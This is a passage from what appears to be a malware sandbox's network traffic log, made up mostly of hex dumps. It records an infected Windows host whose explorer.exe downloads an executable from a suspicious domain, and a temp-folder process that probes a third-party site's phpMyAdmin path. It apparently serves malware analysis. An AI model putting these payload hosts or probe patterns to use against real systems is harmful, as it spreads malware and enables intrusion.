2024-02-20 23:23:00 UTC	15331	OUT	Data Raw: 98 2e 0f e0 44 a0 ab 1f bb 5b 78 ca a4 cb 9a ea 23 4c 83 d6 ad 04 b4 55 a6 53 da 56 3c 3d 68 c3 5c 90 e3 b9 d3 6a f4 a9 89 7e 7d 88 6e 1d f1 0b 1a f6 3d 9f 51 c2 bb ba fd 93 ff 49 f9 20 9f 27 fc d9 1e c8 e2 c6 c0 79 7b 30 85 1b 67 74 1a d7 68 aa 18 25 f0 1c 21 6e b0 8f 02 99 ac f0 31 ca 09 45 d5 83 ec 36 6b 7a f2 5b 04 3e 2a 8c 54 c3 7e 7b 50 99 15 f1 07 a8 73 6e 47 6c 95 68 78 70 1d d3 63 16 e4 f3 58 51 c0 d0 fd b8 8d 31 cd b5 2b 5d 22 2c 62 0c ff da 25 e1 1b 6d 4e 64 5f 14 ec 84 07 fb 46 05 be 72 0b bd b8 ee 1d dd 2d 6c b7 7b fc 96 4d 6a 02 87 96 7e 15 67 06 c0 12 a4 29 bd aa 9a 33 f1 56 11 3d 28 a3 69 3e 15 74 d8 7d d2 f4 53 6e 88 f0 0d be be 60 fe f5 89 a9 76 69 b8 67 44 ff c2 26 74 6b 57 46 7d 34 0e 20 1a 9f 3d 3a 28 e0 ba d7 98 73 e1 1d 34 78 73 fb Data Ascii: .D[x#LUSV<=h\j~}n=QI 'y{0gth%!n1E6kz[>*T~{PsnGlhxpcXQ1+]",b%mNd_Fr-l{Mj~g)3V=(i>t}Sn`vigD&tkWF}4 =:(s4xs
2024-02-20 23:23:00 UTC	15331	OUT	Data Raw: ef e4 2e b4 d3 b3 9c fa c5 98 ea 65 5c 1b bb 9a 88 62 1d 16 a4 94 b3 c0 5e 09 6f 23 82 9c b6 02 43 cd 3f f0 5a 7d 66 53 90 10 b8 06 3e 7f 1f a0 2d 6a f8 b2 03 2d b3 9e 42 b9 fb 35 a3 9e 84 80 57 81 09 c3 d4 d0 4d 23 26 b8 54 98 7d a9 61 e9 61 2d 21 ff 15 43 00 df f1 1b 31 2d 3a 00 b7 58 b2 dc 20 4a 63 0c 54 40 33 92 ad 0f 71 c8 cd ce 8d d8 13 ce 70 8c 04 85 9f d0 f9 d9 65 4d 2b cf 58 cd 3a 2b 8b 3f 2d 9a 7f d9 71 f8 44 26 8f 51 c8 09 42 48 ab 16 e2 e1 24 7a 55 e2 46 20 96 c7 f0 e4 a1 2b 62 72 d7 23 52 c5 5c 26 ea ab 3e ae ed 62 a7 d5 73 cc 9c b7 df c8 27 05 f7 6c 91 fe 7e ba b1 9f 57 d3 3b 2a 70 a5 67 ad be 6a 07 b4 1f 2b 52 e4 ea 7c 42 d1 5a 4a 7c ef a0 28 e0 b5 86 e6 8b 77 9a 17 a3 98 e9 c9 ca d0 dc a0 49 6b e1 f0 dc 7f 12 15 eb 6d f8 23 aa 7f e7 1d 13 Data Ascii: .e\b^o#C?Z}fS>-j-B5WM#&T}aa-!C1-:X JcT@3qpeM+X:+?-qD&QBH$zUF +br#R\&>bs'l~W;*pgj+R\|BZJ\|(wIkm#
2024-02-20 23:23:00 UTC	15331	OUT	Data Raw: 44 5a d1 b9 d5 ba 5f a6 e5 53 aa 6d 8c 93 3c e4 12 c5 94 15 fb 84 03 79 17 cc e5 e9 b4 00 4f 80 a8 59 f9 62 4c d1 84 4a e3 23 cd 8b 20 54 f1 bb 5a bf cd 0c dd 2e 89 5c 45 3a 53 02 24 a6 a2 73 69 97 79 c8 e5 7d 71 b2 47 41 d2 f2 a3 24 b3 eb d4 f2 83 4d 3c c7 d7 8b 55 c1 f5 ff 30 5f cc bf 0f 84 07 c4 9c e8 5c 40 03 e9 a9 45 41 86 20 ea de b7 7a dd a1 41 57 99 60 39 ab 5c 9a 52 fb 42 8e 91 1c ee e8 ca ae 17 17 e5 f5 b6 18 03 16 04 ef 09 24 7f 14 10 dc 3d 0c a2 d2 03 d8 df a6 d3 fa 86 0f ec ed 26 9e 6a c1 02 3c e3 a7 58 2d f3 73 0a cc 6e ab 76 9d 2e ff b2 5d a1 06 3a 57 75 da c6 3a f4 81 e5 31 61 60 b3 35 7a e9 7d 0d 01 49 af d4 44 d0 cc 74 37 d6 e1 b5 f7 02 e0 77 3a df 2d 00 3a 6a c7 17 c9 16 06 61 4e dd 10 a3 8e b8 3f 98 d6 f0 3f ae 87 e7 dc b4 94 7b 65 fa Data Ascii: DZ_Sm<yOYbLJ# TZ.\E:S$siy}qGA$M<U0_\@EA zAW`9\RB$=&j<X-snv.]:Wu:1a`5z}IDt7w:-:jaN??{e
2024-02-20 23:23:00 UTC	15331	OUT	Data Raw: 2f ed 01 9b 42 11 01 e3 7e b3 fd 11 ac 95 30 d6 79 17 38 83 c9 86 53 32 b6 2d 99 52 47 2b 5d 5d a5 ff 52 13 cb b1 b5 19 8d c4 01 04 f3 ef ad 59 69 7e 12 38 c4 a1 18 77 af 5f 3b 67 5b 12 b8 fd fc b0 b6 b1 fa ea f6 15 cc 88 c4 93 03 2c 69 d1 2e 7e c0 b3 2d 2d 60 21 24 fd 0a d0 06 11 a6 e9 18 8a 6a a9 4b 4b 84 00 5c 97 fb 02 d8 a8 34 ea 71 8f 81 d4 ba d5 a2 3d 58 6c e9 f7 94 32 20 c3 7b 7f fb e8 82 00 4e 74 5c 6e 04 36 6b 86 fb 39 b3 86 58 3f 2c 94 1a e6 27 cc ce aa e6 f6 ee b6 02 58 d8 cf a7 44 85 8c 70 92 32 3c c1 df 70 bb 0a 4f b5 99 a8 df 07 f2 97 5d 03 17 ce 81 7c 5a 32 21 e9 14 35 22 71 c1 b4 95 de e7 92 bf 0a 53 21 1c 2a 75 79 71 76 b7 9c 24 7c 36 b2 4b e6 f5 37 25 49 b1 82 89 2e b8 49 6b 88 04 a7 51 34 5e a5 9f 85 7d cd 1f 9d c9 dd 33 35 87 2c 7c e4 Data Ascii: /B~0y8S2-RG+]]RYi~8w_;g[,i.~--`!$jKK\4q=Xl2 {Nt\n6k9X?,'XDp2<pO]\|Z2!5"qS!*uyqv$\|6K7%I.IkQ4^}35,\|
2024-02-20 23:23:00 UTC	15331	OUT	Data Raw: de db b5 29 34 66 b6 86 e8 4a 76 b2 3f 2e 5b da b4 b3 53 60 2d a5 46 e0 f3 db a8 9a 11 72 9f c7 ca 0f 9f df 0d 6c cf ff 1e 29 ac 00 2d d8 d0 3d 18 d5 37 d4 b1 af 43 3f 28 9f ff 58 51 20 d1 c9 68 49 5a fc 02 f3 0f df 7d f9 d5 04 1d 44 a5 a4 38 93 75 90 37 b6 9c d2 20 33 85 11 71 5e ae d8 59 bb 22 af 1f d0 57 73 75 7d b6 d0 45 7a bf d9 ef 38 5a bb 53 2e 66 55 bb 13 3f 92 fa fd 95 f0 43 8f 66 cd 2a 53 a3 82 fd 2e 29 fd bb bd a3 f7 c8 82 fe 1b 67 7e f7 67 e6 dc 47 30 75 2d f8 ac ee 1e a0 65 67 d4 0f d5 55 6b e1 2e e3 91 b6 4b 49 bb 89 2f cf 33 01 54 47 f9 5d aa bf 4d b6 fd 36 06 c9 f8 fd 14 26 59 ee c2 96 d6 85 46 83 da 3b a2 5f 6a 59 87 5d 18 8e 9c 0f 38 ee b8 4c 14 19 a2 58 dd a1 a8 01 5f 01 fe 38 8c 9c 15 f2 81 c7 a0 d7 fd b8 6e c8 a8 5b 68 aa 1a c4 3c 87 Data Ascii: )4fJv?.[S`-Frl)-=7C?(XQ hIZ}D8u7 3q^Y"Wsu}Ez8ZS.fU?Cf*S.)g~gG0u-egUk.KI/3TG]M6&YF;_jY]8LX_8n[h<
2024-02-20 23:23:00 UTC	15331	OUT	Data Raw: bf 2b 76 ec ff 1d f6 a7 03 66 cc aa 00 fd 6d 5d 59 27 e7 3a 80 df 0a f5 bc de b3 3a 4d 00 a2 9c 07 64 7a ef 46 30 62 55 70 11 35 ee ad 2a 7e fb 5b bf d4 e3 6b 10 1f 46 fc 8a e0 5c eb 97 38 f3 87 d5 b2 63 98 ae 31 9f a6 31 b4 e2 4e ab 49 9c 71 74 2d 61 5b a4 56 c7 5a e1 81 ef 02 b7 12 6b 17 bb 50 3f bf 60 d9 27 e6 34 74 dc a9 18 24 fc d3 a7 c6 a9 6d e5 df e1 ff 5e ee 6d 66 08 fa 3e 82 f6 19 0c 45 79 4e a3 94 7b 54 b1 ca 83 dc 86 20 4f 6f f0 04 f5 1e 54 6c 93 4c a4 a9 2b ad 1a f0 00 f8 d3 20 60 3b e4 a2 3c 3f f8 8e 9d b0 29 ca f9 e9 b7 ea 79 fa de 05 12 7d b0 6d 57 eb 7d 04 f9 36 ca 6b 7f e9 ab 63 da 18 f8 32 da 1a 22 ab 7c 44 8d 1f 77 09 e4 be fd e6 6e 2b 45 2b 9e 30 15 24 6f e1 6c 6d 36 e1 29 88 09 cc 2a 86 90 e0 c5 fb 93 cd e1 c7 e7 46 52 44 28 81 90 89 Data Ascii: +vfm]Y'::MdzF0bUp5~[kF\8c11NIqt-a[VZkP?`'4t$m^mf>EyN{T OoTlL+ `;<?)y}mW}6kc2"\|Dwn+E+0$olm6)FRD(
2024-02-20 23:23:02 UTC	816	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:23:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pce5bt07g78st7g79h3a48sfa2; expires=Sat, 15-Jun-2024 17:09:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fz15IVX1tvYZN%2FlEIsYyznHNMDnA4i6cdZFwuDn3Vjp5b6yC85QLpAhIIHzj%2FV%2BQCv%2Ba7va1jyRvsyDeEahyIwqIRR5VjmqXrgyZxx%2FYR7zjR2pVnyzLuI0LmHzuI%2BD8gUfSOuesOXKCqaU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7eae9e7c4291-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49754	198.252.102.119	443	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:23:27 UTC	176	OUT	GET /BeachGeology.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: wearethebestin2024.com
2024-02-20 23:23:27 UTC	355	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:23:27 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:23:27 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache
2024-02-20 23:23:27 UTC	1393	IN	Data Raw: 35 36 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a Data Ascii: 565<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	50937	198.185.159.145	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:04 UTC	298	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77562 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:04 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: Ygs3qqFp/kqJ2ZWQp Connection: close
2024-02-20 23:26:04 UTC	888	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; t
2024-02-20 23:26:04 UTC	2372	IN	Data Raw: 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 7d 0a 0a 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 30 70 78 29 20 7b 0a 20 Data Ascii: line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) {
2024-02-20 23:26:04 UTC	538	IN	Data Raw: 6d 69 5a 42 48 6d 70 71 30 38 6a 47 70 55 6a 53 64 5a 74 69 39 47 76 54 30 73 50 47 55 56 34 4d 4d 67 45 5a 59 6c 6b 6d 43 48 48 41 4e 6e 36 56 59 42 4a 34 37 70 35 59 70 67 2f 45 75 4d 76 62 4f 64 58 2f 4a 6d 2f 38 6c 76 2b 4c 64 36 66 4d 4b 50 47 78 71 48 49 76 46 67 70 45 78 76 58 6a 45 4b 45 58 54 39 47 6a 67 57 69 53 6b 54 58 52 68 67 7a 2b 33 75 42 46 44 4e 6b 6b 58 62 73 35 66 64 35 32 68 5a 35 30 34 62 4a 4e 61 6f 45 6d 61 57 66 61 53 59 59 6c 42 4c 6b 6b 56 71 42 73 4f 44 4f 6c 58 6e 58 54 2f 2f 66 6f 30 2f 66 6f 42 37 79 53 4b 77 34 67 34 77 79 54 2b 7a 70 6e 4e 4b 2f 61 72 58 75 58 35 74 61 35 4a 31 5a 35 72 30 52 59 77 58 72 52 75 69 4f 6d 39 4e 53 75 68 71 2f 64 33 6a 66 34 64 69 77 71 47 56 47 76 52 42 68 34 6a 6d 77 59 36 4a 44 6f 71 33 61 Data Ascii: miZBHmpq08jGpUjSdZti9GvT0sPGUV4MMgEZYlkmCHHANn6VYBJ47p5Ypg/EuMvbOdX/Jm/8lv+Ld6fMKPGxqHIvFgpExvXjEKEXT9GjgWiSkTXRhgz+3uBFDNkkXbs5fd52hZ504bJNaoEmaWfaSYYlBLkkVqBsODOlXnXT//fo0/foB7ySKw4g4wyT+zpnNK/arXuX5ta5J1Z5r0RYwXrRuiOm9NSuhq/d3jf4diwqGVGvRBh4jmwY6JDoq3a
2024-02-20 23:26:04 UTC	4744	IN	Data Raw: 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 67 4c 72 4d 45 50 44 73 6d 57 53 65 54 50 32 70 67 42 49 56 71 72 34 34 6c 6a 6e 44 4f 63 34 32 4e 44 66 6d 4b 4a 73 63 52 6e 7a 6a 73 6c 4c 75 38 59 44 37 44 65 55 69 51 74 61 38 71 2b 67 54 4d 38 55 75 4a 67 78 71 73 31 6c 74 6c 78 47 6d 46 33 6d 48 52 65 38 77 37 4d 36 59 4b 62 70 59 57 42 49 5a 77 36 61 62 41 58 6f 49 4e 58 43 48 76 38 57 49 59 64 68 61 75 38 62 57 43 32 56 39 39 31 71 78 55 4b 4c 49 65 53 35 79 6f 63 46 76 32 57 53 65 6a 45 64 66 68 77 Data Ascii: 84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhw
2024-02-20 23:26:04 UTC	5930	IN	Data Raw: 70 4a 37 65 50 5a 37 7a 32 42 34 6e 4e 71 5a 6c 52 56 48 75 78 69 6a 6c 4a 65 75 42 6c 72 79 73 6c 2b 69 6b 4c 76 59 32 7a 37 51 6c 34 6d 56 68 79 4d 59 37 67 34 49 67 4d 4b 47 45 6f 72 41 2b 6f 45 41 71 53 31 6a 43 78 42 45 73 73 4c 4b 71 37 6c 67 48 36 36 54 62 31 69 75 4f 48 4a 65 4e 34 38 66 32 2b 4b 4c 4f 6b 53 51 47 46 69 74 78 6d 58 61 36 58 30 6a 6c 58 6e 4f 63 77 50 6a 6d 78 73 37 35 4f 6c 77 4c 58 52 56 65 34 71 63 37 6b 4a 34 67 53 4c 69 6b 4c 68 2f 65 49 57 63 44 69 6f 4d 69 33 5a 54 57 61 47 6f 63 71 41 61 45 2b 74 34 6d 32 31 66 2b 6d 36 32 44 63 56 64 70 62 63 59 38 65 6b 34 68 41 55 5a 47 69 6a 58 6a 4c 39 62 33 45 77 6c 72 64 72 75 61 47 4f 31 73 38 45 4a 66 45 52 67 6a 56 6e 72 54 78 4d 31 63 67 7a 5a 6e 6a 69 6d 2f 35 46 42 70 58 78 7a Data Ascii: pJ7ePZ7z2B4nNqZlRVHuxijlJeuBlrysl+ikLvY2z7Ql4mVhyMY7g4IgMKGEorA+oEAqS1jCxBEssLKq7lgH66Tb1iuOHJeN48f2+KLOkSQGFitxmXa6X0jlXnOcwPjmxs75OlwLXRVe4qc7kJ4gSLikLh/eIWcDioMi3ZTWaGocqAaE+t4m21f+m62DcVdpbcY8ek4hAUZGijXjL9b3EwlrdruaGO1s8EJfERgjVnrTxM1cgzZnjim/5FBpXxz
2024-02-20 23:26:04 UTC	7116	IN	Data Raw: 56 77 70 49 45 6f 42 53 77 6f 6f 34 71 46 49 42 55 55 43 46 4b 6d 68 53 49 41 5a 47 62 54 49 59 55 4d 42 46 54 78 55 71 4b 43 43 68 77 6f 56 56 50 42 51 6f 59 49 4b 41 53 72 55 33 77 4d 4d 6b 39 52 41 41 41 42 34 41 58 54 4f 41 37 42 6a 4d 52 53 41 34 66 2b 6d 58 64 75 32 62 64 75 32 6a 66 71 68 75 75 31 71 74 49 4f 31 62 64 75 32 62 64 75 32 62 5a 37 42 4d 6f 4d 76 79 57 45 77 67 4c 67 63 74 46 7a 45 55 72 31 6d 2f 65 59 6b 64 77 55 64 6b 56 53 4d 36 68 4c 79 34 73 59 4b 38 4f 30 62 69 51 45 72 73 59 6c 50 59 70 4b 54 6d 67 78 6b 49 51 64 35 4b 45 41 52 53 6c 43 47 43 72 39 56 47 73 51 67 44 67 6c 49 51 67 72 53 6b 4a 47 73 35 43 51 76 42 53 6c 4b 53 63 70 53 6b 62 67 59 31 61 6f 30 7a 30 78 68 6b 48 70 46 54 4f 4b 53 6b 4b 53 6b 4a 43 32 5a 79 45 59 75 Data Ascii: VwpIEoBSwoo4qFIBUUCFKmhSIAZGbTIYUMBFTxUqKCChwoVVPBQoYIKASrU3wMMk9RAAAB4AXTOA7BjMRSA4f+mXdu2bdu2jfqhuu1qtIO1bdu2bdu2bZ7BMoMvyWEwgLgctFzEUr1m/eYkdwUdkVSM6hLy4sYK8O0biQErsYlPYpKTmgxkIQd5KEARSlCGCr9VGsQgDglIQgrSkJGs5CQvBSlKScpSkbgY1ao0z0xhkHpFTOKSkKSkJC2ZyEYu
2024-02-20 23:26:04 UTC	8302	IN	Data Raw: 33 38 57 49 71 76 76 78 68 48 31 49 33 68 55 72 53 55 6e 64 2f 39 67 39 30 75 54 64 45 7a 51 78 6e 64 77 75 35 53 56 55 69 41 67 69 45 52 59 79 61 71 63 38 5a 48 5a 6b 41 55 73 79 4c 5a 74 44 43 6a 50 34 53 66 55 2f 30 46 46 2f 66 77 53 48 65 39 48 6b 2b 71 6e 4e 64 33 39 6b 58 77 50 2f 44 43 6e 35 42 61 59 69 55 51 41 52 59 6b 42 53 42 58 56 58 67 6c 49 49 4e 4c 49 62 65 56 76 61 4e 48 4e 75 4a 4f 59 46 72 56 2b 57 61 30 4d 43 4b 31 55 6f 54 49 44 51 6a 53 52 76 36 4e 52 66 38 4a 50 2f 69 6a 4f 76 47 76 70 30 41 50 70 36 66 73 50 6e 33 31 2f 61 4b 2f 6e 32 4e 44 6f 75 61 31 74 35 34 34 65 75 69 78 50 2f 54 59 65 78 72 37 44 37 78 6d 62 2f 39 2b 31 49 77 38 75 48 70 71 78 74 66 55 4d 58 4c 56 72 38 75 72 2b 34 33 76 48 4e 58 6c 63 77 2b 58 74 56 37 77 4d Data Ascii: 38WIqvvxhH1I3hUrSUnd/9g90uTdEzQxndwu5SVUiAgiERYyaqc8ZHZkAUsyLZtDCjP4SfU/0FF/fwSHe9Hk+qnNd39kXwP/DCn5BaYiUQARYkBSBXVXglIINLIbeVvaNHNuJOYFrV+Wa0MCK1UoTIDQjSRv6NRf8JP/ijOvGvp0APp6fsPn31/aK/n2NDoua1t544euixP/TYexr7D7xmb/9+1Iw8uHpqxtfUMXLVr8ur+43vHNXlcw+XtV7wM
2024-02-20 23:26:04 UTC	6676	IN	Data Raw: 50 64 33 65 7a 6e 32 49 73 6d 2b 41 6f 2b 51 39 36 4d 39 52 41 48 55 77 55 31 74 6a 75 4f 6a 63 54 74 4a 4f 41 73 2b 55 77 6d 4b 59 31 42 35 5a 70 4d 66 62 71 73 50 6a 54 53 65 38 4d 56 46 53 2b 59 64 62 63 33 2f 65 66 50 37 2f 2f 50 50 6c 77 63 51 66 35 30 51 74 66 75 50 2f 46 4c 39 35 66 46 4c 6e 79 42 4c 4b 55 6b 67 33 61 38 35 44 7a 77 69 42 65 32 4a 4b 59 38 65 53 70 71 39 70 63 53 69 62 64 78 46 49 2b 47 37 50 52 48 45 37 74 71 4a 72 50 47 65 6e 6a 34 46 6e 6e 65 4b 6b 35 6c 2b 76 4a 5a 6a 73 79 57 62 4b 4e 54 42 63 4b 30 78 75 47 74 37 32 33 2b 41 64 36 64 32 66 58 61 45 73 79 6e 55 2f 72 78 74 69 75 37 61 76 37 70 6c 65 4e 62 35 7a 41 63 62 53 7a 32 54 54 47 78 70 47 44 71 63 4a 6c 45 57 4a 61 58 55 51 33 2b 54 67 73 49 4e 59 35 30 45 33 44 31 49 Data Ascii: Pd3ezn2Ism+Ao+Q96M9RAHUwU1tjuOjcTtJOAs+UwmKY1B5ZpMfbqsPjTSe8MVFS+Ydbc3/efP7//PPlwcQf50QtfuP/FL95fFLnyBLKUkg3a85DzwiBe2JKY8eSpq9pcSibdxFI+G7PRHE7tqJrPGenj4FnneKk5l+vJZjsyWbKNTBcK0xuGt723+Ad6d2fXaEsynU/rxtiu7av7pleNb5zAcbSz2TTGxpGDqcJlEWJaXUQ3+TgsINY50E3D1I
2024-02-20 23:26:04 UTC	10674	IN	Data Raw: 49 2f 74 6e 4b 5a 39 69 4b 38 34 52 71 34 43 4f 48 7a 6e 36 77 4b 76 79 49 6c 35 63 62 42 53 39 64 70 6d 76 6c 6b 65 46 44 4c 7a 4f 5a 45 70 30 4b 48 76 49 6e 71 6b 55 51 46 54 2b 31 51 64 66 65 76 67 52 50 2f 38 61 57 73 36 48 71 4c 4a 32 64 57 4a 59 6e 6a 42 6c 32 77 73 32 75 56 61 2f 4c 76 62 4b 70 73 4f 47 41 4f 32 79 59 4b 64 47 70 6f 43 46 2f 6f 6b 72 6b 73 44 4f 52 62 6b 76 36 52 51 35 39 6c 50 55 56 73 57 43 6d 71 6a 49 33 4e 65 57 72 4d 63 55 66 7a 6e 58 73 39 66 47 4d 36 76 46 43 5a 48 61 56 45 2f 31 54 30 30 74 46 44 41 66 63 73 62 47 38 4e 31 4b 6f 6e 76 4c 47 44 45 58 48 6b 42 58 46 44 4a 63 51 77 38 74 39 5a 75 66 66 71 34 6a 46 4d 30 50 33 56 42 65 52 4c 75 55 6a 39 70 77 45 5a 4f 42 32 71 58 71 78 73 32 42 77 41 6d 65 63 6a 42 4a 36 4a 5a Data Ascii: I/tnKZ9iK84Rq4COHzn6wKvyIl5cbBS9dpmvlkeFDLzOZEp0KHvInqkUQFT+1QdfevgRP/8aWs6HqLJ2dWJYnjBl2ws2uVa/LvbKpsOGAO2yYKdGpoCF/okrksDORbkv6RQ59lPUVsWCmqjI3NeWrMcUfznXs9fGM6vFCZHaVE/1T00tFDAfcsbG8N1KonvLGDEXHkBXFDJcQw8t9Zuffq4jFM0P3VBeRLuUj9pwEZOB2qXqxs2BwAmecjBJ6JZ
2024-02-20 23:26:04 UTC	11860	IN	Data Raw: 76 50 37 74 50 47 37 54 33 6e 4b 2f 44 33 6b 56 64 38 37 66 50 68 37 6b 38 56 33 6b 51 4f 54 79 42 4f 30 4d 5a 6b 4e 4d 54 74 74 68 7a 50 6e 55 79 52 49 48 49 6e 6c 45 47 2b 61 65 51 34 77 48 7a 56 49 69 57 69 69 4e 43 65 78 63 49 4e 42 6d 48 65 79 49 37 4f 63 6b 48 33 41 4b 4b 69 75 6e 56 53 50 4b 44 49 73 56 32 6c 4c 4a 68 72 6c 43 4f 4d 64 36 45 62 52 75 56 54 57 59 42 61 36 79 6b 54 48 6e 31 4a 71 4a 49 44 53 32 62 64 76 7a 78 34 6d 72 2b 50 48 68 63 52 51 4f 69 2b 64 76 47 34 33 6b 39 64 31 6b 38 65 34 77 45 44 31 55 52 58 39 7a 52 48 70 78 74 4d 2f 77 64 50 61 58 4b 51 30 32 61 71 76 71 57 68 76 7a 6c 4b 31 47 35 5a 72 62 77 36 56 6e 55 32 2f 35 74 63 32 65 5a 2f 54 37 4e 53 54 70 4c 34 59 39 66 59 39 46 5a 69 2b 6d 4b 2f 65 43 2b 38 70 4e 4a 62 6e Data Ascii: 